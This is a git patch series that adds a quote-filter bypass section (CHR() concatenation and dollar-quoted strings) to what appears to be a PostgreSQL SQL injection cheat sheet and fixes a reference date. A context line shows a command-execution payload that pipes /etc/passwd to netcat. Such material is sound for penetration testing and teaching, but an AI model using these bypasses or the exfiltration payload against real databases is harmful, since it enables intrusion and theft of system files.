From baadc6d3e9af55aef0120e342fb6120b329ee31f Mon Sep 17 00:00:00 2001 From: hloverflow Date: Sun, 12 Jul 2020 13:14:26 +0800 Subject: [PATCH 1/3] contribute PostgreSQL bypass quotes technique --- SQL Injection/PostgreSQL Injection.md | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index e25c1c5..2dafcb3 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -203,6 +203,25 @@ CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu SELECT system('cat /etc/passwd | nc '); ``` +### Bypass Filter + +#### Quotes + +Using CHR + +```sql +SELECT CHR(65)||CHR(66)||CHR(67); +``` + +Using Dollar-signs ( >= version 8 PostgreSQL) + +```sql +SELECT $$This is a string$$ +SELECT $TAG$This is another string$TAG$ +``` + + + ## References * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) @@ -210,3 +229,4 @@ SELECT system('cat /etc/passwd | nc '); * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) * [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/) * [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli) +* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - 2019 - INFIGO](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf) From 37f66cc5239098ecad4fbeb9c2f1ba104addfd7c Mon Sep 17 00:00:00 2001 From: HLOverflow Date: Sun, 12 Jul 2020 13:17:43 +0800 Subject: [PATCH 2/3] add to table of content --- SQL Injection/PostgreSQL Injection.md | 1 + 1 file changed, 1 insertion(+) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 2dafcb3..5fbb10d 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -23,6 +23,7 @@ * [PostgreSQL Command execution](#postgresql-command-execution) * [CVE-2019–9193](#cve-20199193) * [Using libc.so.6](#using-libcso6) +* [Bypass Filter](#bypass-filter) * [References](#references) ## PostgreSQL Comments From 2e7b9db94bf09d5dae4c906ba539d2bb45d63210 Mon Sep 17 00:00:00 2001 From: hloverflow Date: Sun, 12 Jul 2020 13:21:18 +0800 Subject: [PATCH 3/3] Corrected Reference to 2009 paper --- SQL Injection/PostgreSQL Injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 5fbb10d..18a5b90 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -230,4 +230,4 @@ SELECT $TAG$This is another string$TAG$ * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) * [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/) * [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli) -* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - 2019 - INFIGO](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf) +* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - 2009 - INFIGO](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)